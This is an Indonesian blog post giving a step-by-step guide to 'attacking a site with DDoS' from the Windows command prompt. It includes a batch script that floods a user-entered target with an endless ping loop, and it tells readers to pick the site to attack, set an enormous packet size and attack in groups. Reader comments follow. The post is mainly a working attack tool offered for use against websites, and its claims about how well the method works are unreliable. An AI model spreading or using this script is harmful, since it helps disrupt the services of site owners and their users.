Cara Menyerang Suatu Situs Dengan DDOS Menggunakan CMD

ILMUANE new update

↑ Grab this Headline Animator

Cara Menyerang Suatu Situs Dengan DDOS Menggunakan CMD - 

Hay sahabat Newbie seperti saya, kali ini saya akan share Cara Menyerang Suatu Situs Dengan DDOS Menggunakan CMD ,Pengertian singkat tentang DDOS atau Distributed Denial Of Services adalah cara menyerang suatu situs dengan melumpuhkan sumber daya situs yang dituju dengan mengirimkan beberapa paket secara terus menerus hingga situs menjadi down dan error .

Kali ini kita akan coba DDOS dengan menggunakan cmd / command promp, sebelumnya kita copy paste kan script berikut ke notepad .

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS


  • Simpan Script diatas dengan nama DDOS.bat dan dengan format all files, lalu buka lagi DDOS.bat yang baru saja kita buat seperti berikut :



  • Server-target isikan dengan nama domain / nama situs yang akan kita DDOS, misal disini saya akan DDOS situs lokal saya sendiri yaitu www.ekoskanifo.com




  • Setelah kita isikan server-target maka akan muncul alamat ip target seperti diatas, lalu pada ip host isikan ip address target kita seperti gambar diatas
  • Lalu akan ada packet size, isikan terserah anda misalkan 1000000000




  • Setelah itu tekan enter maka proses DDOS akan berjalan, DDOS membutuhkan waktu yang lumayan lama tergantung kemampuan situs yang kita DDOS. Akan lebih baik kalau kita melakukan DDOS secara serentak atau dengan banyak orang, .


Sumber : Pontianakc3.wikiforum ( Cyber Pontianak )
Dunia Aneh
Kumpulan Artikel Unik dan Aneh sepanjang Masa
Catatan dosen

Tips Android dan BBM
Kumpulan Ulasan tentang Tips Android dan BBM
Putera Dosen

Meme Lucu Banget
Kumpulan Meme Lucu yang lagi ngetren
Cds Blog

Kumpulan Artikel Menarik
Semua Artikel yang Kamu Cari Ada di sini
230 Penulis
Ads by BLOGGER

4 Responses to " Cara Menyerang Suatu Situs Dengan DDOS Menggunakan CMD "

  1. Om Gimana nih saya gak Mengerti pas di command promp nya :D kasih tau lebih detailnya om :v

    ReplyDelete
    Replies
    1. pencet aja tombol Windows+R trus ketik CMD ..

      Delete

SILAHKAN BERKOMENTAR YANG SOPAN... Jangan meninggalkan link aktif , komentar spam tidak akan dipublikasikan!